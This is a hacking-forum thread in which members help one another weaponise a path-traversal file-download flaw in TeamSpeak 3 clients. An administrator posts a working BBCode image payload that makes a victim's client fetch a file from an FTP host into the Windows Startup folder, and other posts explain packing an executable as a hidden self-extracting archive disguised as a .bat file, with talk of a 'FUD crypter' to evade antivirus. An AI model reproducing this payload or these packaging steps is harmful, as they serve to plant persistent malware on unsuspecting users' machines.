RFI vulnerability in TeamSpeak [3.0.0 - 3.0.18.1]

sobolek

Member
Nov 18, 2015
12
3
38
Can some1 help me with setup this?
Just need .bat script for that to run .exe file downloaded -> Can some1 make it ?

/// Can someone help me with seting it up? I can crypt your file for that. FUD crypter ;) Doing with TeamViewer/ Skype screen share.
 
Last edited:

bl4uni

Active Member
Sep 10, 2015
106
69
73
Okay, you have your file (.exe). You now open your file using notepad++. In the first line you will add the code to extract itself and to run the .exe. Then you rename the .exe to .bat. (Make sure it's not .bat.exe). That's it.

If you still don't understand how to do it you should read through the pastebin again. And make sure your ftp server is correctly set up with an anonymous account.
Also remember that this does not work on the newest version and should only be used for testing, not for actually infecting somebody.
 

sobolek

Member
Nov 18, 2015
12
3
38
Okay, you have your file (.exe). You now open your file using notepad++. In the first line you will add the code to extract itself and to run the .exe. Then you rename the .exe to .bat. (Make sure it's not .bat.exe). That's it.

If you still don't understand how to do it you should read through the pastebin again. And make sure your ftp server is correctly set up with an anonymous account.
Also remember that this does not work on the newest version and should only be used for testing, not for actually infecting somebody.
Yo man. My FTP is set up correctly, i know that, cause I have anonymous account without password - All files roaming/...bla...bla..bla/ and done everything like you said - Edited my file to extract and etc.. But when i click on my ts3 channel with this
- Its not downloading it.. Tested on 3.0.18.1 - Tried with new link from first post - Same as nothing.. Nothing downloaded - Searched all my PC for the file - nothing. Can you help me with it thru teamviewer/Skype? I will be tommorow ~~16:00PM Polish Time. ( You can check Polish time here: https://www.google.pl/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=time in poland )

Thank's for respond !!
 

Kaptan647

Retired Staff
Contributor
Apr 25, 2015
314
395
112
Yo man. My FTP is set up correctly, i know that, cause I have anonymous account without password - All files roaming/...bla...bla..bla/ and done everything like you said - Edited my file to extract and etc.. But when i click on my ts3 channel with this
- Its not downloading it.. Tested on 3.0.18.1 - Tried with new link from first post - Same as nothing.. Nothing downloaded - Searched all my PC for the file - nothing. Can you help me with it thru teamviewer/Skype? I will be tommorow ~~16:00PM Polish Time. ( You can check Polish time here: https://www.google.pl/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=time in poland )

Thank's for respond !!
Rfi is patched at 3.0.18.1. That is why it is not downloading it
 

Supervisor

Administrator
Apr 27, 2015
1,863
2,546
335
nope, it is patched in 3.0.18.2
To make it work with 3.0.18.1 ->
Works with 3.0.18.1 if you simply change your link to the following:
[IMG]http://ftp://8.8.8.8/..%5C/..%5C/..%5C/..%5C/..%5C/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/PoC.bat%20.jpg[/IMG]
 

sobolek

Member
Nov 18, 2015
12
3
38
Tested all informations from you.. Still cant setup it to get working. All done (i think correctly) but its not downloading my .bat file. Tested on 3.0.18.1. Can some1 help me ?
 

Kaptan647

Retired Staff
Contributor
Apr 25, 2015
314
395
112
Tested all informations from you.. Still cant setup it to get working. All done (i think correctly) but its not downloading my .bat file. Tested on 3.0.18.1. Can some1 help me ?
Can you send the logs ?
 

Supervisor

Administrator
Apr 27, 2015
1,863
2,546
335
Are you sure you are not running 3.0.18.2?
Make sure you use 3.0.18 first - then move on to 3.0.18.1
 

bl4uni

Active Member
Sep 10, 2015
106
69
73
Hey, normally Teamspeak saves its images in %appdata%. However while installing you can select not to save images there, but rather in the teamspeak install directory. What your TS3 Client is trying to do is going up from C:/Program Files (x86)/TeamSpeak 3 Client22222/config/cache/remote/<server-ip>/
It will obviously not land in %appdata% like that.
 

sobolek

Member
Nov 18, 2015
12
3
38
Hey, normally Teamspeak saves its images in %appdata%. However while installing you can select not to save images there, but rather in the teamspeak install directory. What your TS3 Client is trying to do is going up from C:/Program Files (x86)/TeamSpeak 3 Client22222/config/cache/remote/<server-ip>/
It will obviously not land in %appdata% like that.
Its not downloading.. It isn't anywhere.
 

bl4uni

Active Member
Sep 10, 2015
106
69
73
It can't create the folder. Try reinstalling your teamspeak and make sure your cache is located in %appdata%
 

sobolek

Member
Nov 18, 2015
12
3
38
For everyone with corrupted file after opening .bat
Just add .exe to winrar -> make it .sfx. Go to SFX options -> Make it run after unpack (type filename.exe). Check HIDE ALL and just pack it. Then change from file.sfx.exe to file.exe -> then edit in notepad++ add the first line, make sure its ending with good symbols (like on screen from first post paste).
 

ehthe

Retired Staff
Contributor
Apr 26, 2015
1,029
896
216
If the file is empty that means teamspeak did not recognize it as an image file and deleted its content.
 

Supervisor

Administrator
Apr 27, 2015
1,863
2,546
335
I tried its downloading but .jpg files
that is because your file really looks like this: test.bat.jpg
Now why is that? -> you have to enable "show known file endings" or whatever its called in english:
It should look similar in your language, so if you did this, rename the file again.

a0412baac3.png


9534dbbcd0.jpg


8ddc24a8f9.png
 

Laszl0w

Well-Known Member
Oct 10, 2015
217
149
143
Tested with 3.0.1.6 works perfect but got some questions.

My files is always 0 byte.

Why??
 
Top